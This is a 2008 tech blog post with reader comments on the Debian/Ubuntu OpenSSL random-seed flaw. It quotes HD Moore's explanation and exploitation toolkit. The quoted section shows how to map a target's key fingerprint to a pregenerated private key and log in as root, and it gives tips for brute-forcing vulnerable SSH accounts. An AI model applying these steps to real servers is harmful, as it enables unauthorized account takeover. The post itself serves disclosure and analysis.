With the Quickness: HD Moore sets new land speed record with exploitation of Debian/Ubuntu OpenSSL flaw

With the Quickness: HD Moore sets new land speed record with exploitation of Debian/Ubuntu OpenSSL flaw

Summary: So, for those who haven't heard, a Debian packager modified the source used for OpenSSL on Debian based systems (Debian and the whole of the Ubuntu family) to remove the seed used for PRNG (Pseudo Random Number Generator) used when creating SSL keys.  Well, HD Moore set a new record for speed to exploit with the release of what he calls Debian-OpenSSL Toys.

SHARE:

HD Moore MetasploitSo, for those who haven't heard, a Debian packager modified the source used for OpenSSL on Debian based systems (Debian and the whole of the Ubuntu family) to remove the seed used for PRNG (Pseudo Random Number Generator) used when creating SSL keys.  Well, HD Moore set a new record for speed to exploit with the release of what he calls Debian-OpenSSL Toys.

HD describes the bug on the page, and I've quoted his explanation below:

On May 13th, 2008 the Debian project announced that Luciano Bello found an interesting vulnerability in the OpenSSL package they were distributing. The bug in question was caused the removal of the following line of code from md_rand.c

MD_Update(&m,buf,j); [ .. ] MD_Update(&m,buf,j); /* purify complains */
These lines were removed because they caused the Valgrind and Purify tools to produce warnings about the use of uninitialized data in any code that was linked to OpenSSL. You can see one such report to the OpenSSL team here. Removing this code has the side effect of crippling the seeding process for the OpenSSL PRNG. Instead of mixing in random data for the initial seed, the only "random" value that was used was the current process ID. On the Linux platform, the default maximum process ID is 32,768, resulting in a very small number of seed values being used for all PRNG operations.

Mmmm... don't you love security tools?  Just goes to show you, no matter how great your tool set is, and I do like Valgrind, you have to understand how they work and more importantly how your code works.  No tool can be smart enough to tell you that the warning its complaining about with uninitialized data should be ignored (or at least fixed and not removed from the codebase) because it will effectively render the encryption you are trying to accomplish neutered.

The impact to this is unbelievably huge, as HD mentions:

All SSL and SSH keys generated on a Debian-based systems (Ubuntu, Kubuntu, etc) between September 2006 and May 13th, 2008 may be affected.  In the case of SSL keys, all generated certificates will be need to recreated and sent off to the Certificate Authority to sign.  Any Certificate Authority keys generated on a Debian-based system will need be regenerated and revoked.  All system administrators that allow users to access their servers with SSH and public key authentication need to audit those keys to see if any of them were created on a vulnerabile system.  Any tools that relied on OpenSSL's PRNG to secure the data they transferred may be vulnerable to an offline attack.  Any SSH server that uses a host key generated by a flawed system is subjection to traffic decryption and a man-in-the-middle attack would be invisible to the users.

This flaw is ugly because even systems that do not use the Debian software need to be audited in case any key is being used that was created on a Debian system.

Onto HD's toys, click read more below to continue...

This is poached directly from HD's page for time savings and because I'm definitely not a crypto guy:

The Toys

The blacklists published by Debian and Ubuntu demonstrate just how small the key space is. When creating a new OpenSSH key, there are only 32,767 possible outcomes for a given architecture, key size, and key type. The reason is that the only "random" data being used by the PRNG is the ID of the process. In order to generate the actual keys that match these blacklists, we need a system containing the correct binaries for the target platform and a way to generate keys with a specific process ID. To solve the process ID issue, I wrote a shared library that could be preloaded and that returns a user-specified value for the getpid() libc call.

The next step was to build a chroot environment that contained the actual binaries and libraries from a vulnerable system. I took a snapshot from a Ubuntu system on the local network. You can find the entire chroot environment here In order to generate an OpenSSH key with a specific type, bit count, and process ID, I wrote a shell script that could be executed from within the chroot environment. You can find this shell script here. This script is placed into the root directory of the extracted Ubuntu filesystem. In order to generate a key, this script is called with the following command line:

# chroot ubunturoot /dokeygen.sh 1 -t dsa -b 1024 -f /tmp/dsa_1024_1
This will generate a new OpenSSH 1024-bit DSA key with the value of getpid() always returning the number "1". We now have our first pre-generated SSH key. If we continue this process for all PIDs up to 32,767 and then repeat it for 2048-bit RSA keys, we have covered the valid key ranges for x86 systems running the buggy version of the OpenSSL library. With this key set, we can compromise any user account that has a vulnerable key listed in the authorized_keysfile. This key set is also useful for decrypting a previously-captured SSH session, if the SSH server was using a vulnerable host key. Links to the pregenerated key sets for 1024-bit DSA and 2048-bit RSA keys (x86) are provided in the downloads section below.

The interesting thing about these keys is how they are tied to the process ID. Since most Debian-based systems use sequential process ID values (incrementing from system boot and wrapping back around as needed), the process ID of a given key can also indicate how soon from the system boot that key was generated. If we look at the inverse of that, we can determine which keys to use during a brute force based on the target we are attacking. When attempting to guess a key generated at boot time (like a SSH host key), those keys with PID values less than 200 would be the best choices for a brute force. When attacking a user-generated key, we can assume that most of the valid user keys were created with a process ID greater than 500 and less than 10,000. This optimization can significantly speed up a brute force attack on a remote user account over the SSH protocol.

In the near future, this site will be updated to include a brute force tool that can be used quickly gain access to any SSH account that allows public key authentication using a vulnerable key. The keys in the data files below use the following naming convention:

/ Algorithm / Bits / Fingerprint-ProcessID and / Algorithm / Bits / Fingerprint-ProcessID.pub
To obtain the private key file for any given public key, you need to know the key fingerprint. The easiest way to obtain this fingerprint is through the following command:
$ ssh-keygen -l -f targetkey.pub 2048 c6:7b:14:fa:ae:b6:89:e6:67:17:ee:04:17:b0:ec:4e targetkey.pub
If we look at the public key in an editor, we can also infer that the key type is RSA. In order to locate the private key for this public key, we need to extract the data files, and look for a file named:
 rsa/2048/c67b14faaeb689e66717ee0417b0ec4e-26670
In the example above, the fingerprint is represented in hexadecimal with the colons removed, and the process ID is indicated as "26670". If we want to authenticate to a vulnerable system that uses this public key for authentication, we would run the following command:
$ ssh -i rsa/2048/c67b14faaeb689e66717ee0417b0ec4e-26670 root@targetmachine

Tools

- GetPID Faker Shared Library (4.0K) - Ubuntu Root Filesystem (4.9M) - Key Generation Script (8.0K)

Keys

- SSH 1024-bit DSA Keys X86 (30.0M) - SSH 2048-bit RSA Keys X86 (48.0M) - SSH 4096-bit RSA Keys X86 (94.0M)

Frequently Asked Questions

Q: How long did it take to generate these keys? A: About two hours for the 1024-bit DSA and 2048-bit RSA keys for x86. I used 31 Xeon cores clocked at 2.33Ghz.

Q: Will you share your code for distributing the key-generation across mulitple processors? A: Nope. The code is hardcoded for this specific cluster and is too poorly-written to be worth cleaning up.

Q: How long does it take a crack a SSH user account using these keys? A: This depends on the speed of the network and the configuration of the SSH server. It should be possible to try all 32,767 keys of both DSA-1024 and RSA-2048 within a couple hours, but be careful of anti-brute-force scripts on the target server.

Q: I use 16384-bit RSA keys, can these be broken? A: Yes, its just a matter of time and processing power. For mere mortals, 4096-bit keys are already a little on the paranoid side. All possible 4096-bit keys should be available within the next day or so. It is possible to generate all combinations of 8192-bit and 16384-bit keys, but I probably have better uses for my processors :-)

All that I can say is, unbelievable.  Serious flaw, yes, but the turnaround time by HD is ridiculous... I think he's trying to get himself nominated for a pwnie award.  HD, it's cheating if you are on the voting panel though!

-Nate

Topics: Software, Open Source, Operating Systems, Security

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

30 comments
Log in or register to join the discussion
  • As a crypto guy, I have to scream OUCH!!!!

    "All SSL and SSH keys generated on a Debian-based systems (Ubuntu, Kubuntu, etc) between September 2006 and May 13th, 2008 may be affected. In the case of SSL keys, all generated certificates will be need to recreated and sent off to the Certificate Authority to sign. Any Certificate Authority keys generated on a Debian-based system will need be regenerated and revoked."

    As somewhat of a crypto guy, I have to scream OUCH!!!! Certificates don't come cheap. Revoking Root CA keys are painful since that touches everything. This is the equivalent of a scorched earth attack in the crypto world.
    georgeou
    • Hey George!

      Good as always to see you here!

      Yeah, what really concerns me is that a key generated on a debian system and used elsewhere is still vulnerable if I read this right, and, as HD was mentioning in his blog, the entropy is based entirely off the PID. This is worsened since in Debian systems the PIDs are relatively sequential in terms of their loading and tend to be predictable for specific processes (at least to within a range), so this reduces the posibilities down more.

      So, its one thing to say you've brute forced the key space, it's another to say you could probably guestimate a small range of keys that would lead to success.

      -Nate
      nmcfeters
      • Revoking a Root Certificate Authority is PAINFUL

        Revoking a Root Certificate Authority is PAINFUL. If you're running a bunch of Linux, Windows and Mac machines that trusts a particular CA that generated its certificate using this crippled PRNG, then you gotta either touch every machine or use some kind of management system to change out all the clients.

        The PRNG is one of the foundation pieces in crypto. If that's broken (or disabled), the whole thing is built on a deck of cards.


        George Ou
        http://www.ForMortals.com
        georgeou
  • Only half the story

    The purpose of using that "uninitialised buffer" (it is in fact uninitialized and its use is valid and intentional) is to help seed the pseudo-random number generator. If you have a /dev/urandom device, OpenSSL will use data from that rather than only the PID and the garbage in the uninitialized buffer and this exploit will not work anyway. This exploit only works as intended when:
    1. you have no /dev/urandom (or similar) OR
    2. you have /dev/urandom but configured OpenSSL not to use it (now why would anyone do THAT)

    The PRNG seeding code exploited here is really a last desperate attempt to try to initialize a random number generator; cryptographers gnash their teeth when they see such code but understand that some people don't have a choice ...

    There is an extremely important lesson to learn here though, and for people who read the LKML you've probably seen this sort of thing come up in numerous flame wars:
    1. leave the damned code alone if you don't know what you're doing
    2. Compiler warnings and numerous other warnings from PERL scripts, tools like Valgrind, etc. do NOT indicate a fault in the code being compiled or tested. Screwing up the code to please some tool and generate fewer (or no) warnings is a genuine sign of ignorance. A competent programmer knows when to ignore warnings and when to scream at the compiler developers for senselessly issuing meaningless warnings.

    Hmmm... I can just imagine Linus ranting again because some idiot submitted yet another 'patch' that eliminated a few hundred compiler warnings ... I haven't been on the LKML for over a year now so I have no idea when this sort of thing last happened on the kernel project.

    Deleting that one line was really making a statement: I'm a MORON and can't be bothered actually reading the code to see what it does.
    zoroaster
    • Whoops.

      My reply below was to this.
      odubtaig
    • To be fair

      You make great points, but to be fair, I think we have to reasonably assume that the entire Linux programming community is not as good a programmer as someone who was on the LKML, so props to you for that.

      You make the point:
      2. Compiler warnings and numerous other warnings from PERL scripts, tools like Valgrind, etc. do NOT indicate a fault in the code being compiled or tested. Screwing up the code to please some tool and generate fewer (or no) warnings is a genuine sign of ignorance. A competent programmer knows when to ignore warnings and when to scream at the compiler developers for senselessly issuing meaningless warnings.

      Uninitialized code CAN lead to faults that are security issues, which is why the tools report them. You are spot on though, this should've been reviewed and it should've been understood why it was uninitialized.

      I'm also a bit concerned that a debian packager was able to make these changes without going through any other checks to see what was going on.

      -Nate
      nmcfeters
    • So is this an unworking exploit. Author, read the above post.

      Not to say that what Debian did was crazy, but can we determine if this is actually a working exploit or if the above post mitigates this. Yes, fix (restore) is needed, however, if you can prove your keys were truly random, there is no need to revoke/regenerate they keys as George explained as painful.

      TripleII

      P.S. Maybe thank goodness for standard default /dev/urandom?
      TripleII-21189418044173169409978279405827
      • it is a genuine concern

        People using OpenSSL to provide keys and certificates generated on a Debian system need to check and make sure their keys are not on that list. Better still, look at their OpenSSL configuration, check the source code, and determine if they are victim of that fault.

        Not all people will be affected, and I won't even try to guess what percentage will be affected, but this is definitely exploitable and with the key sets published, you can decrypt a message in no time.
        zoroaster
  • One thing's for sure.

    Someone at quality control needs to burn for letting this through. It's hardly some obscure little tool that no-one uses, it needs as tight control as any other core element like, oh say, the kernel.
    odubtaig
    • I suspect

      that there was no review at all. Package maintainers are expected to:
      1. hack build scripts etc to make sure the upstream code builds on Debian and files are stored where they belong on the system
      2. fix bugs where they are found and file a big report upstream
      3. hack the source where appropriate to fit in with the way a Debian system works

      This seems to be a case of a 'fix' being made and not reported upstream (I can't imagine whoever patched this wouldn't receive a lot of abuse on the mailing lists). If this were reported as a bug, people would immediately write back and say "you're an idiot, learn to code" (maybe the upstream maintainers would be more civil).
      zoroaster
  • Due diligence

    Don't those people have any controls in place? Forget the fact that a little testing could have caught this, but some impact analysis way before the fact would have prevented this before a line of code was changed. This is a rookie mistake, and any decent experienced developer would have consulted with some peers before taking this kind of action. The main blame here is on the process, or the lack of it in this case.
    Taz_z
    • what process would work?

      I can't think of any process that would catch problems like this. If a second programmer needs to review patches and so on, then if that second programmer knows what they're doing the problem may be caught.

      I've spent almost 4 months building an embedded system from scratch and using many Debian packaged sources; I spent most of that time looking through every single Debian patch and deciding whether to apply it or not. With over 16,000 packages in the Debian archives, who's got time to review patches made by n00bs? I think there was simply an assumption that people know what they're doing, and here's an obvious (and unfortunately extremely critical) case where that's just not true.
      zoroaster
  • Testing?

    I'm interested to hear how testing could have caught this. The actual functionality wasn't broken.
    archerjoe
    • Reply to "Due Diligence"

      I pushed the wrong reply button.
      archerjoe
    • The functionality was broken

      If you consider the functionality to obtain sufficient entropy and then seed what would be used to create these keys.

      -Nate
      nmcfeters
      • But is that testable functionality?

        Could a test script catch this? On the surface the functionality didn't fail. Functional keys are still generated. It seems to me, testing for sufficient entropy is a tall order and was probably not considered.
        archerjoe
        • A great point

          No, I don't think a functional script could test for this very easily at all.

          It is a functionality flaw though, one that would've need to have been seen in source code.... I'd have prefered that when this was committed to CVS, someone saw it's removal and said... whoa, you're removing the seed.

          Nate
          nmcfeters
    • You missed my pont

      My point is that the ramifications of this should have contemplated before a line of code was changed. The fact that this was exploited so fast suggests to me that an experienced security minded developer could have cut this off before it started and maybe come up with a better way of fulfilling the requirement, assuming that getting rid of warnings about uninitialized data is a requirement. Whoever did this should not have had absolute authority to do this, and the people to blame are the ones who put him in this position, but he should have known to go over this first.
      Taz_z
      • I agree a code review would catch this

        A review at the code level could catch this but I don't believe an automated test would.
        archerjoe
      • Completely agreed

        -Nate
        nmcfeters